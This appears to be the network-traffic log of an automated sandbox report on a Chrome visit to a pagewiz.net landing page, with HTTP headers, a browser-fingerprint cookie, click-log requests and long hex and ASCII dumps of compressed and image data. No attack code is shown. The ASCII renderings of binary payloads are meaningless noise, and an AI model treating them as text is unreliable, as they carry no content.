                                                                Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 [TRUNCATED]
                                                                Data Ascii: 000*H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,XD250403080000Z00U/0-0U0U#0LtI6>j0*H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.54970213.90.63.16806448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                Apr 9, 2025 02:18:33.538063049 CEST451OUTGET /vericastharlandclarke/ HTTP/1.1
                                                                Host: p1.pagewiz.net
                                                                Connection: keep-alive
                                                                Upgrade-Insecure-Requests: 1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                Accept-Encoding: gzip, deflate
                                                                Accept-Language: en-US,en;q=0.9
                                                                Apr 9, 2025 02:18:33.640233994 CEST1254INHTTP/1.1 200 OK
                                                                Content-Type: text/html
                                                                Content-Encoding: gzip
                                                                Last-Modified: Tue, 08 Apr 2025 19:12:14 GMT
                                                                Accept-Ranges: bytes
                                                                ETag: "89341723baa8db1:0"
                                                                Vary: Accept-Encoding
                                                                Server: Microsoft-IIS/10.0
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:33 GMT
                                                                Content-Length: 3140
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 3c 4a 1e 9b 1f 79 36 a3 1f 6d d1 96 f9 d1 e3 bb f2 33 79 bc c8 db 8c 5a b6 ab ed fc 17 ad 8b cb cf 3e 9a 56 cb 36 5f b6 db ed f5 2a ff 28 d5 bf 3e fb a8 cd df b5 77 01 ea 30 9d ce b3 ba c9 db cf d6 ed f9 f6 c1 47 06 c6 32 5b e4 9f 7d f4 36 bf be aa ea 59 e3 bd d9 69 71 59 e4 57 ab aa 6e bd 16 57 c5 ac 9d 7f f6 f0 d3 9d 51 ba c8 de 15 8b f5 62 bb 99 66 65 fe d9 6e e7 dd 59 de 4c eb 62 d5 16 d5 d2 7b 1d 8d ca 62 f9 36 9d d7 f9 f9 67 1f 61 30 cd a3 bb 77 cf e9 fb 66 7c 51 55 17 65 9e ad 8a 66 3c ad 16 77 f3 ac 2e af b3 e9 34 6f 9a bb d4 c3 f9 3c 9f d4 f9 d5 78 da 10 c6 75 5e 7e f6 51 d3 5e 97 79 33 cf 73 42 10 24 d0 91 73 83 bb d4 91 20 [TRUNCATED]
                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"O<y<M<Jy6m3yZ>V6_*(>w0G2[}6YiqYWnWQbfenYLb{b6ga0wf|QUef<w.4o<xu^~Q^y3sB$s e&~6!t?>[Ou^_?EtM|6kx]W%kUT~\=Ofe1/eC}wv{?gzwW>0c7o@&2T4~8/O-V |6WiVM/?'U6mT~]7WT?}unZ,*j'?:Ys^_gg4jw-Y=0b>h$-$w_5L|d\,mY#(wj[,,i6dW\INZ^q(E^o~QGoyqq:ky'M29<}Ojv?|*%>%K}s3;)OEv'>]OWo~eu'>_]{vrw^?XV,kg{?_?S^WO'
                                                                Apr 9, 2025 02:18:33.640444994 CEST1254INData Raw: f1 67 82 cf f9 ef 9f ad db 4a bc ad f3 ac 6c 72 fe 94 47 4f a2 54 2d 7f ff 59 51 83 c9 eb e2 62 ae 4c 7e fe fb b7 d5 ea f7 6f c8 56 e0 fb 86 26 f0 ed b5 f7 ee f9 ef 3f a9 da b6 5a c4 5b 78 9a 4d 7f c1 3b d3 92 9a b4 f3 ba 5a 5f cc 9b df 5f 0c 51
                                                                Data Ascii: gJlrGOT-YQbL~oV&?Z[xM;Z__QC&$;?&;~M?=tG#(Yqvl^-fn?z}_|~vW_ow~}'v|3O?>j@74F
                                                                Apr 9, 2025 02:18:33.640486002 CEST928INData Raw: ae 6d 01 2c c2 36 d2 c3 66 38 da 26 04 a5 b4 e5 4e c2 b7 bd 2f c2 57 a8 77 fd 4e 21 46 df d3 ef c2 57 0d 71 36 b2 8a 43 7b 63 b3 1b be 96 c0 81 dc 38 ac 7f 49 84 b9 0b 65 c3 7f 9e 67 8b a2 bc 7e 74 5c 17 59 79 28 4c 03 96 da bb 7f 7f 94 9a 7f ee
                                                                Data Ascii: m,6f8&N/WwN!FWq6C{c8Ieg~t\Yy(LH+}orD*W?H:bcn+Jx =UM:Is;L],<(Zp';fXvfXa:&eCR/IS??K
                                                                Apr 9, 2025 02:18:36.031868935 CEST1068OUTGET /favicon.ico HTTP/1.1
                                                                Host: p1.pagewiz.net
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Referer: http://p1.pagewiz.net/vericastharlandclarke/
                                                                Accept-Encoding: gzip, deflate
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: BrowserData=pid%3D648467%26href%3Dhttp%253A//p1.pagewiz.net/vericastharlandclarke/%26hostname%3Dp1.pagewiz.net%26referrer%3D%26appCodeName%3DMozilla%26appName%3DNetscape%26appVersion%3D5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26cookieEnabled%3Dtrue%26language%3DMozilla%26platform%3DWin32%26userAgent%3DMozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26screenWidth%3D1280%26screenHeight%3D1024
                                                                Apr 9, 2025 02:18:36.133882046 CEST1254INHTTP/1.1 200 OK
                                                                Cache-Control: private
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Encoding: gzip
                                                                Vary: Accept-Encoding
                                                                Server: Microsoft-IIS/10.0
                                                                X-AspNet-Version: 4.0.30319
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:36 GMT
                                                                Content-Length: 1506
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 37 4e 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 4c 5f 7e f5 e4 f9 d9 49 fa d1 f6 dd bb df bd 77 72 f7 ee d3 37 4f d3 df fb db 6f be 78 9e ee 8e 77 d2 37 75 b6 6c 8a b6 a8 96 59 79 f7 ee e9 8b 8f d2 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee be 79 75 f7 1d 60 ed e2 65 fd 75 bb f5 de 1c cf da d9 47 47 d4 35 be 4a df 2d ca 65 f3 59 04 ce ee c3 87 0f e5 f5 8f 52 6e 9d 67 33 fa 99 d2 f3 b8 2d da 32 3f 7a 7c 57 7e ea 87 8b bc cd 68 14 ed 6a 3b ff 45 eb e2 f2 b3 8f 7e ef ed af 8e b7 4f aa c5 2a 6b 8b 49 99 7f 94 4e ab 65 9b 2f db cf 3e 3a 3b fd 2c 9f 5d d0 27 77 8f e8 4d 7e 14 48 59 2c df a6 75 5e 7e f6 51 d3 5e 97 79 33 cf f3 f6 a3 74 5e e7 e7 82 63 43 48 4e 57 [TRUNCATED]
                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7NO<y<ML_~Iwr7Ooxw7ulYymzt/yu`euGG5J-eYRng3-2?z|W~hj;E~O*kINe/>:;,]'wM~HY,u^~Q^y3t^cCHNWUv_?Oi]]Gi{?Ou?hM^z9{!TUHiTjG!D)hGeA?~o~{wN[ZyKKAEYqNv1KXi.lAO~702+W_^|7?x>|w9i.'Sy{wVtj^_8!|n/N_Uw{>y76iY.4L41#qHIR>!>@ALGuZy=^-/Bl9+)f|7G&MgoKb^Hhm5x{DnU>F^Q/CO4w?z(7EbnbNOjEV,o<Y;gyhw.K,[{t9hw<z<,:g
                                                                Apr 9, 2025 02:18:36.133910894 CEST521INData Raw: 97 39 19 9d 5f b4 ce 9b 36 9f a5 d3 6c b9 24 66 9b e4 e9 39 86 3e 7e 7c 77 72 2b d8 35 89 e0 cd ed 6e 6e f1 92 26 ad c9 d3 e9 3c 9f be 25 44 33 d2 a3 84 ed 57 af 9e a7 45 c3 2a 95 50 a4 51 e4 d3 b6 bc 1e df b6 db b3 16 6f 67 65 53 a5 64 ca 1a 18
                                                                Data Ascii: 9_6l$f9>~|wr+5nn&<%D3WE*PQogeSddo%vu=<%vy$5D|.xPG_[\[;}/$Xz9r>NZI=7waH0YzQ<+kIgu<{uzn7"{UE
                                                                Apr 9, 2025 02:18:45.979190111 CEST1381OUTPOST /Handler/Clicklog.aspx?PageId=648467 HTTP/1.1
                                                                Host: p1.pagewiz.net
                                                                Connection: keep-alive
                                                                Content-Length: 156
                                                                X-Requested-With: XMLHttpRequest
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: application/json, text/javascript, */*; q=0.01
                                                                Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                Origin: http://p1.pagewiz.net
                                                                Referer: http://p1.pagewiz.net/vericastharlandclarke/
                                                                Accept-Encoding: gzip, deflate
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: BrowserData=pid%3D648467%26href%3Dhttp%253A//p1.pagewiz.net/vericastharlandclarke/%26hostname%3Dp1.pagewiz.net%26referrer%3D%26appCodeName%3DMozilla%26appName%3DNetscape%26appVersion%3D5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26cookieEnabled%3Dtrue%26language%3DMozilla%26platform%3DWin32%26userAgent%3DMozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26screenWidth%3D1280%26screenHeight%3D1024
                                                                Data Raw: 6d 6f 64 65 3d 63 6c 69 63 6b 6c 6f 67 26 63 6f 6e 76 65 72 73 69 6f 6e 3d 66 61 6c 73 65 26 70 61 67 65 64 61 74 61 3d 59 41 47 59 64 43 6c 43 6e 69 61 33 33 42 58 6a 33 5a 25 32 42 68 51 63 44 75 63 70 6b 72 61 72 79 4b 56 4e 42 74 48 73 48 6e 6c 6f 25 32 46 52 70 51 6b 65 39 39 4c 70 25 32 46 6d 41 78 46 33 42 6e 31 64 71 32 53 6c 7a 70 31 31 6f 62 61 61 74 59 46 32 51 6a 55 68 4f 79 67 7a 32 4e 4a 75 6d 45 33 32 75 5a 5a 39 77 53 6f 42 79 62 57 57 41 25 33 44
                                                                Data Ascii: mode=clicklog&conversion=false&pagedata=YAGYdClCnia33BXj3Z%2BhQcDucpkraryKVNBtHsHnlo%2FRpQke99Lp%2FmAxF3Bn1dq2Slzp11obaatYF2QjUhOygz2NJumE32uZZ9wSoBybWWA%3D
                                                                Apr 9, 2025 02:18:46.083740950 CEST400INHTTP/1.1 200 OK
                                                                Cache-Control: private
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Encoding: gzip
                                                                Vary: Accept-Encoding
                                                                Server: Microsoft-IIS/10.0
                                                                X-AspNet-Version: 4.0.30319
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:45 GMT
                                                                Content-Length: 132
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e f1 47 75 de ac cb f6 a3 47 3b bf e4 ff 01 9d 98 6b 29 0c 00 00 00
                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~GuG;k)
                                                                Apr 9, 2025 02:19:31.092066050 CEST6OUTData Raw: 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.54973113.90.63.16806448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                Apr 9, 2025 02:18:36.344424963 CEST952OUTGET /favicon.ico HTTP/1.1
                                                                Host: p1.pagewiz.net
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: BrowserData=pid%3D648467%26href%3Dhttp%253A//p1.pagewiz.net/vericastharlandclarke/%26hostname%3Dp1.pagewiz.net%26referrer%3D%26appCodeName%3DMozilla%26appName%3DNetscape%26appVersion%3D5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26cookieEnabled%3Dtrue%26language%3DMozilla%26platform%3DWin32%26userAgent%3DMozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26screenWidth%3D1280%26screenHeight%3D1024
                                                                Apr 9, 2025 02:18:36.447257996 CEST1254INHTTP/1.1 200 OK
                                                                Cache-Control: private
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Encoding: gzip
                                                                Vary: Accept-Encoding
                                                                Server: Microsoft-IIS/10.0
                                                                X-AspNet-Version: 4.0.30319
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:36 GMT
                                                                Content-Length: 1506
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 7e e3 e4 37 4e 1e ff ae 4f bf 3c 79 f3 fb bc 3c 4d e7 ed a2 4c 5f 7e f5 e4 f9 d9 49 fa d1 f6 dd bb df bd 77 72 f7 ee d3 37 4f d3 df fb db 6f be 78 9e ee 8e 77 d2 37 75 b6 6c 8a b6 a8 96 59 79 f7 ee e9 8b 8f d2 8f e6 6d bb 7a 74 f7 ee d5 d5 d5 f8 ea de b8 aa 2f ee be 79 75 f7 1d 60 ed e2 65 fd 75 bb f5 de 1c cf da d9 47 47 d4 35 be 4a df 2d ca 65 f3 59 04 ce ee c3 87 0f e5 f5 8f 52 6e 9d 67 33 fa 99 d2 f3 b8 2d da 32 3f 7a 7c 57 7e ea 87 8b bc cd 68 14 ed 6a 3b ff 45 eb e2 f2 b3 8f 7e ef ed af 8e b7 4f aa c5 2a 6b 8b 49 99 7f 94 4e ab 65 9b 2f db cf 3e 3a 3b fd 2c 9f 5d d0 27 77 8f e8 4d 7e 14 48 59 2c df a6 75 5e 7e f6 51 d3 5e 97 79 33 cf f3 f6 a3 74 5e e7 e7 82 63 43 48 4e 57 [TRUNCATED]
                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"~7NO<y<ML_~Iwr7Ooxw7ulYymzt/yu`euGG5J-eYRng3-2?z|W~hj;E~O*kINe/>:;,]'wM~HY,u^~Q^y3t^cCHNWUv_?Oi]]Gi{?Ou?hM^z9{!TUHiTjG!D)hGeA?~o~{wN[ZyKKAEYqNv1KXi.lAO~702+W_^|7?x>|w9i.'Sy{wVtj^_8!|n/N_Uw{>y76iY.4L41#qHIR>!>@ALGuZy=^-/Bl9+)f|7G&MgoKb^Hhm5x{DnU>F^Q/CO4w?z(7EbnbNOjEV,o<Y;gyhw.K,[{t9hw<z<,:g
                                                                Apr 9, 2025 02:18:36.447304964 CEST521INData Raw: 97 39 19 9d 5f b4 ce 9b 36 9f a5 d3 6c b9 24 66 9b e4 e9 39 86 3e 7e 7c 77 72 2b d8 35 89 e0 cd ed 6e 6e f1 92 26 ad c9 d3 e9 3c 9f be 25 44 33 d2 a3 84 ed 57 af 9e a7 45 c3 2a 95 50 a4 51 e4 d3 b6 bc 1e df b6 db b3 16 6f 67 65 53 a5 64 ca 1a 18
                                                                Data Ascii: 9_6l$f9>~|wr+5nn&<%D3WE*PQogeSddo%vu=<%vy$5D|.xPG_[\[;}/$Xz9r>NZI=7waH0YzQ<+kIgu<{uzn7"{UE
                                                                Apr 9, 2025 02:18:46.109827995 CEST976OUTGET /Handler/Clicklog.aspx?PageId=648467 HTTP/1.1
                                                                Host: p1.pagewiz.net
                                                                Connection: keep-alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                Accept: */*
                                                                Accept-Encoding: gzip, deflate
                                                                Accept-Language: en-US,en;q=0.9
                                                                Cookie: BrowserData=pid%3D648467%26href%3Dhttp%253A//p1.pagewiz.net/vericastharlandclarke/%26hostname%3Dp1.pagewiz.net%26referrer%3D%26appCodeName%3DMozilla%26appName%3DNetscape%26appVersion%3D5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26cookieEnabled%3Dtrue%26language%3DMozilla%26platform%3DWin32%26userAgent%3DMozilla/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%2529%2520AppleWebKit/537.36%2520%2528KHTML%252C%2520like%2520Gecko%2529%2520Chrome/134.0.0.0%2520Safari/537.36%26screenWidth%3D1280%26screenHeight%3D1024
                                                                Apr 9, 2025 02:18:46.210702896 CEST404INHTTP/1.1 200 OK
                                                                Cache-Control: private
                                                                Content-Type: text/html; charset=utf-8
                                                                Content-Encoding: gzip
                                                                Vary: Accept-Encoding
                                                                Server: Microsoft-IIS/10.0
                                                                X-AspNet-Version: 4.0.30319
                                                                X-Powered-By: ASP.NET
                                                                Date: Wed, 09 Apr 2025 00:18:45 GMT
                                                                Content-Length: 136
                                                                Data Raw: 1f 8b 08 00 00 00 00 00 04 00 ed bd 07 60 1c 49 96 25 26 2f 6d ca 7b 7f 4a f5 4a d7 e0 74 a1 08 80 60 13 24 d8 90 40 10 ec c1 88 cd e6 92 ec 1d 69 47 23 29 ab 2a 81 ca 65 56 65 5d 66 16 40 cc ed 9d bc f7 de 7b ef bd f7 de 7b ef bd f7 ba 3b 9d 4e 27 f7 df ff 3f 5c 66 64 01 6c f6 ce 4a da c9 9e 21 80 aa c8 1f 3f 7e 7c 1f 3f 22 5e 66 17 f9 55 f1 83 f4 79 b6 9c 15 cb 8b 14 7f 37 ff 0f 4a d9 2f 8f 15 00 00 00
                                                                Data Ascii: `I%&/m{JJt`$@iG#)*eVe]f@{{;N'?\fdlJ!?~|?"^fUy7J/
                                                                Apr 9, 2025 02:19:31.222359896 CEST6OUTData Raw: 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.54970113.90.63.16806448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                Apr 9, 2025 02:19:15.738401890 CEST6OUTData Raw: 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.54970779.127.206.2074436448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-04-09 00:18:33 UTC683OUTGET /Media/2025-04-08-18-41-23-280meltrdtlzycycrwsmkhokxzmr_UserMedia.png HTTP/1.1
                                                                Host: m1.pagewizcdn.com
                                                                Connection: keep-alive
                                                                sec-ch-ua-platform: "Windows"
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                sec-ch-ua-mobile: ?0
                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                Sec-Fetch-Site: cross-site
                                                                Sec-Fetch-Mode: no-cors
                                                                Sec-Fetch-Dest: image
                                                                Sec-Fetch-Storage-Access: active
                                                                Referer: http://p1.pagewiz.net/
                                                                Accept-Encoding: gzip, deflate, br, zstd
                                                                Accept-Language: en-US,en;q=0.9
                                                                2025-04-09 00:18:34 UTC408INHTTP/1.1 200 OK
                                                                Date: Wed, 09 Apr 2025 00:18:34 GMT
                                                                Content-Type: image/png
                                                                Content-Length: 100011
                                                                Connection: close
                                                                Last-Modified: Tue, 08 Apr 2025 18:41:23 GMT
                                                                ETag: "b915d0d3b5a8db1:0"
                                                                X-Powered-By: ASP.NET
                                                                X-77-NZT: EggBT3/OzgGBDAG5O98UAbdNTAAA
                                                                X-77-NZT-Ray: 8705ec34cd9e7cb9dabcf56751839107
                                                                X-77-Cache: HIT
                                                                X-77-Age: 19533
                                                                Server: CDN77-Turbo
                                                                X-77-POP: newyorkUSNY
                                                                Accept-Ranges: bytes
                                                                2025-04-09 00:18:34 UTC15976INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 03 12 00 00 00 9a 08 06 00 00 00 3d cf 7e e3 00 00 0c 3e 69 43 43 50 49 43 43 20 50 72 6f 66 69 6c 65 00 00 48 89 95 57 07 58 53 c9 16 9e 5b 92 90 90 d0 42 97 12 7a 13 44 a4 04 90 12 42 0b bd 37 1b 21 09 10 4a 8c 81 a0 62 2f 8b 0a ae 5d 54 c0 86 ae 8a 28 58 01 b1 a0 88 9d 45 b1 f7 c5 82 8a b2 2e 16 ec ca 9b 14 d0 75 5f f9 de f9 be b9 f7 bf ff 9c f9 cf 99 73 e7 96 01 40 fd 38 57 2c ce 43 35 00 c8 17 15 4a e2 42 02 18 29 a9 69 0c 52 0f 40 80 0e 20 02 2a 70 e7 f2 0a c4 ac 98 98 08 00 6d f0 fc 77 7b 77 1d 7a 43 bb e2 28 d3 fa 67 ff 7f 35 4d be a0 80 07 00 12 03 71 06 bf 80 97 0f f1 01 00 f0 2a 9e 58 52 08 00 51 c6 5b 4c 2e 14 cb 30 6c 40 5b 02 13 84 78 a1 0c 67 29 70 95 0c 67 28 f0 1e b9 4f 42 1c 1b e2 36
                                                                Data Ascii: PNGIHDR=~>iCCPICC ProfileHWXS[BzDB7!Jb/]T(XE.u_s@8W,C5JB)iR@ *pmw{wzC(g5Mq*XRQ[L.0l@[xg)pg(OB6
                                                                2025-04-09 00:18:34 UTC16384INData Raw: aa 92 75 e8 f3 60 db 5f 86 d7 0c 2e 6b da 80 ee 5f 7e 7b 9b 76 7f 65 f8 42 6e eb 3b 5b e1 ab 35 38 6a b4 bf cf 84 e3 aa 47 df ec 61 83 ba 2b c4 4a fc fe 07 37 8c 5e ad 05 6d 50 e7 fd d5 4b 01 9f a4 ff 45 da 59 d9 af 11 ff fd c2 57 7d 85 b3 66 d8 95 99 e9 f6 a3 e1 f0 6f 5f dd 0d 8f 9f 8f 83 9b 56 cb 18 01 34 49 08 9e c2 59 2d 28 2e 29 ff 8a a4 54 41 3c 63 0a 39 86 83 0c 88 2e 8c 87 76 36 50 ec c6 28 53 7c 8e 8c 56 d1 d0 fb 12 9b c8 61 8c 5b 7c 92 95 a9 12 3d 3e 63 45 72 0c 03 46 06 c4 0a 3b 92 2f 59 bc 13 d9 a3 e8 13 8a 85 91 a1 b1 c4 9e 16 32 c4 17 31 2e 16 78 76 85 67 a4 0c db 5a 80 fa 3b 15 b5 9e 47 a5 93 7a 7b ed f5 4b 00 bd ed 92 fe 2f e5 55 fd a4 99 cd 1f d5 ee a7 8e 63 44 5e 64 35 4a 7d 04 63 a2 13 1c c4 13 d2 c9 44 03 3c 6b 88 c9 99 0e f7 d9 f0 f0
                                                                Data Ascii: u`_.k_~{veBn;[58jGa+J7^mPKEYW}fo_V4IY-(.)TA<c9.v6P(S|Va[|=>cErF;/Y21.xvgZ;Gz{K/UcD^d5J}cD<k
                                                                2025-04-09 00:18:34 UTC16384INData Raw: 53 57 0b fe 11 1d a9 70 bc a7 29 74 90 80 2f 3f ff c3 60 b0 50 a9 f9 57 99 9d 65 56 27 67 eb 47 e3 2b 61 1c ed 84 cc e9 e2 8c e0 c5 ed af d0 c4 ab f8 52 1c ed eb c0 e9 fa 5c b8 78 fa 28 e7 38 f5 b7 45 3e 4d ea 9b ea a6 e2 9b 7d 59 7f ec 0f ff 3d 21 fa d9 7f 5c bf 49 e6 e3 61 04 89 59 92 3b ae da 38 2f cb 86 e4 21 8d 84 22 66 2a 03 fa 19 72 48 5c 38 75 94 3c 2c c7 2c 0f 0b 08 39 5e c9 f1 e7 0d ff bf 16 fd 7f 4a 41 09 d0 48 dc 60 23 e6 26 c2 a2 82 12 28 f4 ab 85 7f 35 01 a1 90 ff b1 5e 4e 84 7f fd 4e 50 be 1d 1d 51 0b db b9 7f ec 0f ff 55 bf fe 8c ab 50 08 df 34 12 05 95 e4 07 fc a8 69 84 37 f4 b0 7f ea 97 df b0 33 7e 30 48 c3 dc ab b3 13 61 e9 f9 57 21 f3 e8 f3 b0 f8 e0 f7 d8 39 3f e3 9e c2 5b 49 7c f0 43 0b 78 a9 bf 45 37 5b 23 72 59 25 c7 f7 f5 ed 90 fc
                                                                Data Ascii: SWp)t/?`PWeV'gG+aR\x(8E>M}Y=!\IaY;8/!"f*rH\8u<,,9^JAH`#&(5^NNPQUP4i73~0HaW!9?[I|CxE7[#rY%
